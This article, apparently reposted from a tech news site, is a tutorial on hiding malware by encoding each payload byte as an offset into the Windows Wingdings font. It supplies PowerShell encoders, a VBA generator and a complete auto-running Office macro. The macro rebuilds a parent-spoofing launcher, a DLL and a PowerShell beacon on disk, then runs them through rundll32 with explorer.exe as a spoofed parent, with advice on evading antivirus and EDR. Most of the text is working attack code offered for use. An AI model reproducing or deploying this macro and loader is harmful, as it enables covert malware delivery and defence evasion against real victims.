How to use Windows system fonts to create malware

2025-04-06 update, from SLTechnology News&Howtos (Shulou.com), 06/02 report

This article explains in detail how a font that ships with Windows can be used to assemble malware on the target host. The editor considers it very practical and shares it for reference; I hope you get something out of it.

Steps

In most cases a network attack can be broken into the following three steps:

1. Deliver a file containing the payload. The payload contains either
   a) the malicious code to be executed, or
   b) non-malicious code only, because the payload will download the malicious components in step 3.

2. Induce the target user to execute the payload.

3. The payload then either
   a) executes the malicious component, or
   b) downloads the malicious component and then executes it.

My goal

The solution I want has to meet the following conditions:

1. It contains no malicious code (not even malicious bytes), so that it passes perimeter defences.

2. It does not need to download any malicious code.

3. It still ends up executing malicious code.

The idea is to use a font already present on the target host so that the malware generates itself there.

First, we need a component that every version of the Windows operating system contains, and I found one:

I compared the Wingdings font (C:\Windows\Fonts\wingding.ttf) across several Windows versions and found the file to be identical in each of them.

Before relying on that, compare the file hash on the build host with the hash on a representative target image (Get-FileHash C:\Windows\Fonts\wingding.ttf): the whole scheme assumes byte-identical fonts, and a different build of the font shifts every offset, so the reconstruction on the target would produce garbage rather than the intended file.

So I intend to use this font to reach my "small" goal. How? The method is roughly as follows:

1. Read the bytes of our malware on our own host.

2. Compare the first byte of the malware with the bytes of the Wingdings font.

3. When a byte with the same value is found in the font, record its offset in a text file.

4. Repeat until every byte of the malware has been matched and its offset recorded in the text file.

5. Our payload then contains only the Wingdings offset corresponding to each byte: no byte of the malware itself is shipped.

6. On the target host, the payload converts each Wingdings offset back into the byte at that position in the local font file and rebuilds the malicious component.

The following PowerShell code finds the font offset corresponding to each byte (Windows PowerShell 5.1 syntax; on PowerShell 7 replace -Encoding Byte with -AsByteStream):

$Font    = "C:\Windows\Fonts\wingding.ttf"
$Malware = "C:\Users\Administrator\Pictures\2.PNG"

$fontArray    = Get-Content $Font -Encoding Byte -ReadCount 0
$malwareArray = Get-Content $Malware -Encoding Byte -ReadCount 0
$offsetArray  = @()

# For every byte of the payload, record the 0-based offset of the first byte
# in the font with the same value. The nested scan is O(n*m); fine for small
# payloads, slow for large ones.
foreach ($byteInMalware in $malwareArray) {
    $index = 0
    foreach ($byteInFont in $fontArray) {
        if ($byteInMalware -eq $byteInFont) {
            $offsetArray += $index
            break
        }
        $index++
    }
}
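As an added example (not code from the original article), the same encoding done with a single pass over the font, followed by a decoder that reverses it, so the scheme can be verified end to end on the build host before any VBA is generated. It also refuses to run if some byte value never occurs in the font, since such a byte cannot be represented at all. The input path C:\Users\Public\Documents\input.bin is an assumption; [System.IO.File]::ReadAllBytes is used instead of Get-Content -Encoding Byte so the script runs unchanged on Windows PowerShell 5.1 and PowerShell 7.

```powershell
# Added example, not from the original article. Paths are assumptions.
$FontPath = 'C:\Windows\Fonts\wingding.ttf'
$DataPath = 'C:\Users\Public\Documents\input.bin'   # file to encode (assumed)

$font = [System.IO.File]::ReadAllBytes($FontPath)
$data = [System.IO.File]::ReadAllBytes($DataPath)
if ($data.Length -eq 0) { throw "input file is empty" }

# 1. One pass over the font: for each of the 256 byte values remember the
#    first (0-based) offset at which it occurs. -1 means "never seen".
$firstOffset = New-Object int[] 256
for ($v = 0; $v -lt 256; $v++) { $firstOffset[$v] = -1 }
for ($i = 0; $i -lt $font.Length; $i++) {
    if ($firstOffset[$font[$i]] -lt 0) { $firstOffset[$font[$i]] = $i }
}

# 2. A value that never occurs in the font cannot be encoded; fail loudly
#    instead of silently dropping bytes.
$missing = @(0..255 | Where-Object { $firstOffset[$_] -lt 0 })
if ($missing.Count -gt 0) {
    throw "wingding.ttf does not contain byte values: $($missing -join ',')"
}

# 3. Encode: every input byte becomes an offset into the font.
[int[]]$offsets = foreach ($b in $data) { $firstOffset[$b] }

# 4. Decode the way the macro does: offset -> byte at that position in the
#    local font. These offsets are 0-based; VBA's Mid() is 1-based, so the
#    macro has to add 1.
$rebuilt = New-Object byte[] $offsets.Count
for ($i = 0; $i -lt $offsets.Count; $i++) { $rebuilt[$i] = $font[$offsets[$i]] }

# 5. Prove the round trip with a hash and show how much larger the decimal
#    offset list is than the original file (it has to fit inside the macro).
$sha     = [System.Security.Cryptography.SHA256]::Create()
$hashIn  = [BitConverter]::ToString($sha.ComputeHash($data))
$hashOut = [BitConverter]::ToString($sha.ComputeHash($rebuilt))
$text    = $offsets -join ','

"Font SHA-256  : $((Get-FileHash -Algorithm SHA256 $FontPath).Hash)"
"Round trip OK : $($hashIn -eq $hashOut)"
"Input bytes   : $($data.Length)"
"Offset text   : $($text.Length) chars, {0:N1}x the input" -f ($text.Length / $data.Length)

# $offsets plays the role of $offsetArray in the VBA generator that follows.
$offsetArray = $offsets
```

The font hash printed first is the value to compare against the target image: if it differs, every offset points at the wrong byte and the round-trip check on the build host proves nothing about the target.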

The following PowerShell code turns $offsetArray into VBA that you can paste into the macro file. It emits one Function per block of offsets; each Function returns an array of offsets, and the macro later joins those arrays and rebuilds the malicious components from them:

$i = 0          # offsets on the current line
$j = 0          # lines in the current Function
$u = 1          # Function counter
$payload = ""
$payDef  = ""

foreach ($offset in $offsetArray) {
    if ($payload -eq "") { $payload = "$offset" } else { $payload += ",$offset" }
    $i++
    if ($i -eq 30) {                 # 30 offsets per line, then a VBA line continuation (" _")
        $payload += " _`r`n"
        $i = 0
        $j++
    }
    if ($j -eq 25) {                 # 25 continued lines per Function (VBA's continuation limit)
        $payDef += "`r`nFunction ccc$u()`r`ntt$u = Array($payload)`r`nccc$u = tt$u`r`nEnd Function"
        $payload = ""
        $u++
        $j = 0
    }
}
if ($payload -ne "") {               # flush the last, partial Function
    $payDef += "`r`nFunction ccc$u()`r`ntt$u = Array($payload)`r`nccc$u = tt$u`r`nEnd Function"
}
$payDef

The result (a screenshot in the original) is a series of VBA Function blocks, ccc1, ccc2, ..., each wrapping an Array() of offsets.

The VBA code below uses the offset arrays created above to rebuild the malicious components on disk. It then picks Explorer.exe as the parent process of RunDll32.exe (to evade EDR parent/child heuristics) and executes the component through RunDll32.exe. Two caveats a defender will notice: the three components are still written to C:\Users\Public\Documents, where AV can scan them once they are complete, and because the launcher is started through WMI (Win32_Process.Create), its immediate parent is WmiPrvSE.exe rather than the Office process, which is itself a well-known indicator. If you do not want to write files to disk, combine this with in-memory injection instead.

The VBA code is as follows:

[...] ' the Function blocks emitted by the PowerShell generator (ccc1 .. ccc18 for the first
      ' component, and the equivalent blocks for the other two) go here

Sub cc()
    ' Example: join the offset arrays for the first malicious component
    T1 = ccc1: T2 = ccc2: T3 = ccc3: T4 = ccc4: T5 = ccc5: T6 = ccc6
    T7 = ccc7: T8 = ccc8: T9 = ccc9: T10 = ccc10: T11 = ccc11: T12 = ccc12
    T13 = ccc13: T14 = ccc14: T15 = ccc15: T16 = ccc16: T17 = ccc17: T18 = ccc18
    ttt = Split(Join(T1, ",") & "," & Join(T2, ",") & "," & Join(T3, ",") & "," & Join(T4, ",") & "," & _
                Join(T5, ",") & "," & Join(T6, ",") & "," & Join(T7, ",") & "," & Join(T8, ",") & "," & _
                Join(T9, ",") & "," & Join(T10, ",") & "," & Join(T11, ",") & "," & Join(T12, ",") & "," & _
                Join(T13, ",") & "," & Join(T14, ",") & "," & Join(T15, ",") & "," & Join(T16, ",") & "," & _
                Join(T17, ",") & "," & Join(T18, ","), ",")
    [...] ' tt and ttttttt are built the same way for the other two components

    Dim nb As Long, nb2 As Long, nb3 As Long   ' Long, not Integer: components can exceed 32767 bytes
    nb = UBound(ttt) - LBound(ttt) + 1         ' ttt is the joined offset array
    nb2 = UBound(tt) - LBound(tt) + 1
    nb3 = UBound(ttttttt) - LBound(ttttttt) + 1

    Dim intFileNumber As Integer
    Dim lngFileSize As Long
    Dim strBuffer As String
    Dim lngCharNumber As Long
    Dim strCharacter As String * 1
    Dim strFileName As String

    ' Read the whole font into a string buffer. Get/Put on a String go through the
    ' ANSI code page; on a system with a multi-byte ANSI code page a Byte array
    ' (Dim buf() As Byte) is the safer buffer type.
    strFileName = "C:\Windows\Fonts\wingding.ttf"
    intFileNumber = FreeFile
    Open strFileName For Binary Access Read Shared As #intFileNumber
    lngFileSize = LOF(intFileNumber)
    strBuffer = Space$(lngFileSize)
    Get #intFileNumber, , strBuffer
    Close #intFileNumber

    Dim nFileNum As Long
    Dim sFilename As String, sFilename2 As String, sFilename3 As String
    Dim ind As Long, off As Long
    sFilename2 = "C:\Users\Public\Documents\changeMyParent.exe"   ' crafted binary that selects the parent of rundll32
    sFilename = "C:\Users\Public\Documents\runPoshCode.dll"       ' .DLL that runs the PowerShell beacon from an image
    sFilename3 = "C:\Users\Public\Documents\BEACON.ico"           ' PowerShell beacon stored in an .ICO

    ' Rebuild each component byte by byte. The offsets from the PowerShell script
    ' are 0-based while Mid() is 1-based, hence the + 1.
    ' (A loop over the three files would be better :-)
    nFileNum = FreeFile
    Open sFilename2 For Binary Lock Read Write As #nFileNum
    For lngCharNumber = 0 To nb - 1
        ind = lngCharNumber + 1
        off = ttt(lngCharNumber)
        strCharacter = Mid(strBuffer, off + 1, 1)
        Put #nFileNum, ind, strCharacter
    Next lngCharNumber
    Close #nFileNum

    nFileNum = FreeFile
    Open sFilename For Binary Lock Read Write As #nFileNum
    For lngCharNumber = 0 To nb2 - 1
        ind = lngCharNumber + 1
        off = tt(lngCharNumber)
        strCharacter = Mid(strBuffer, off + 1, 1)
        Put #nFileNum, ind, strCharacter
    Next lngCharNumber
    Close #nFileNum

    nFileNum = FreeFile
    Open sFilename3 For Binary Lock Read Write As #nFileNum
    For lngCharNumber = 0 To nb3 - 1
        ind = lngCharNumber + 1
        off = ttttttt(lngCharNumber)
        strCharacter = Mid(strBuffer, off + 1, 1)
        Put #nFileNum, ind, strCharacter
    Next lngCharNumber
    Close #nFileNum

    rr
End Sub

Sub rr()
    Dim xx As String
    Dim oihfasf As Object, eopuf As Object, kdj As Object
    Dim pskaf As Long          ' PID; Long, because PIDs exceed the Integer range
    Dim xl As String
    Dim ow As Object, os As Object, oc As Object, op As Object
    Dim lh As Long

    ' Find the PID of explorer.exe through WMI
    xx = "."
    Set oihfasf = GetObject("winmgmts:\\" & xx & "\root\CIMV2")
    Set eopuf = oihfasf.ExecQuery("Select Name, ProcessID FROM Win32_Process", 48)
    For Each kdj In eopuf
        If kdj.Properties_("Name").Value = "explorer.exe" Then
            pskaf = kdj.Properties_("ProcessID").Value
        End If
    Next

    ' changeMyParent.exe starts rundll32 with explorer.exe as its parent. The quoting
    ' of the rundll32 command line is reconstructed from a garbled line in the
    ' original; changeMyParent.exe itself is not shown on the page.
    xl = "C:\Users\Public\Documents\changeMyParent.exe " & _
         """C:\Windows\system32\RunDll32.exe C:\Users\Public\Documents\runPoshCode.dll ComputeFmMediaType -f C:\Users\Public\Documents\BEACON.ico"" " & _
         pskaf

    ' Launch it through WMI; the immediate parent of changeMyParent.exe is therefore
    ' WmiPrvSE.exe, not the Office process
    Set ow = GetObject("winmgmts:\\" & xx & "\Root\cimv2")
    Set os = ow.Get("Win32_ProcessStartup")
    Set oc = os.SpawnInstance_
    Set op = GetObject("winmgmts:\\" & xx & "\root\cimv2:Win32_Process")
    op.Create xl, Null, oc, lh
End Sub

Sub AutoOpen()
    cc
End Sub

Sub Workbook_Open()
    cc
End Sub